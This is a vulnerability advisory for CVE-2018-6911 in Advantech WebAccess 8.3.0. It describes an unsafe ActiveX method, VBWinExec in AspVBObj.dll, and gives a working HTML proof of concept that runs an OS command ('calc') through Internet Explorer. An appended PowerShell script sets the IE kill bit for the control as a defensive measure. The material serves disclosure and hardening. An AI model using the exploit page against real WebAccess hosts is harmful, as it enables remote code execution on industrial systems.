Vulnerability Title: Advantech WebAccess Node8.3.0 "AspVBObj.dll" - Remote Code Execution
Discovered by: Nassim Asrir
Contact: wassline@gmail.com / https://www.linkedin.com/in/nassim-asrir-b73a57122/
CVE: CVE-2018-6911
Tested on: IE11 / Win10
Technical Details:
==================
The VBWinExec function in Node\AspVBObj.dll in Advantech WebAccess 8.3.0 allows remote attackers to execute arbitrary OS commands via a single argument.
Vulnerable File: C:\WebAccess\Node\AspVBObj.dll
Vulnerable Function: VBWinExec
Vulnerable Class: Include
Class Include
GUID: {55F52D11-CEA5-4D6C-9912-2C8FA03275CE}
Number of Interfaces: 1
Default Interface: _Include
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False
The VBWinExec function takes one parameter, which the user/attacker controls, so it can be used to execute an OS command.
Function VBWinExec ( ByRef command As String )
Exploit:
========
<html>
<head>
<title>Advantech WebAccess Node8.3.0 "AspVBObj.dll" - Remote Code Execution</title>
</head>
<BODY>
<object id=rce classid="clsid:{55F52D11-CEA5-4D6C-9912-2C8FA03275CE}"></object>
<SCRIPT>
function exploit()
{
    rce.VBWinExec("calc")
}
</SCRIPT>
<input language=JavaScript onclick=exploit() type=button value="Exploit-Me"><br>
</body>
</HTML>
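The class details above report KillBitSet: False, so one host-side hardening step is to set the Internet Explorer kill bit for that CLSID. The PowerShell below is an added example, not part of the original advisory or any vendor guidance. It is meant to be saved and run as a script file, and it assumes nothing on the host legitimately needs to load this control inside IE.

```powershell
# Added example (not from the advisory): audit and, with -Apply, set the IE kill bit
# for the CLSID the advisory lists. Run elevated; HKLM writes need administrator rights.
param([switch]$Apply)

$Clsid   = '{55F52D11-CEA5-4D6C-9912-2C8FA03275CE}'  # class "Include", from the advisory
$KillBit = 0x400                                      # "do not load in IE" compatibility flag
$Name    = 'Compatibility Flags'
# Native registry view plus the 32-bit view used by 32-bit IE on 64-bit Windows.
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

foreach ($root in $Roots) {
    if (-not (Test-Path -LiteralPath $root)) { continue }   # view absent (e.g. 32-bit OS)
    $key   = "$root\$Clsid"
    $flags = 0
    if (Test-Path -LiteralPath $key) {
        $prop = Get-ItemProperty -LiteralPath $key -Name $Name -ErrorAction SilentlyContinue
        if ($prop) { $flags = $prop.$Name }
    }
    $isSet = ($flags -band $KillBit) -ne 0

    if ($Apply -and -not $isSet) {
        if (-not (Test-Path -LiteralPath $key)) { New-Item -Path $key -Force | Out-Null }
        # Preserve any other compatibility flags already present on the key.
        New-ItemProperty -LiteralPath $key -Name $Name -PropertyType DWord `
            -Value ($flags -bor $KillBit) -Force | Out-Null
        # Read the value back so the report reflects what is actually stored.
        $flags = (Get-ItemProperty -LiteralPath $key -Name $Name).$Name
        $isSet = ($flags -band $KillBit) -ne 0
    }

    # One report row per registry view.
    [pscustomobject]@{
        Key        = $key
        Flags      = '0x{0:X8}' -f $flags
        KillBitSet = $isSet
    }
}
```

Without -Apply the script only reports the current state of each registry view. The kill bit stops hosts that honour it, such as Internet Explorer, from instantiating the control; it does not change AspVBObj.dll itself.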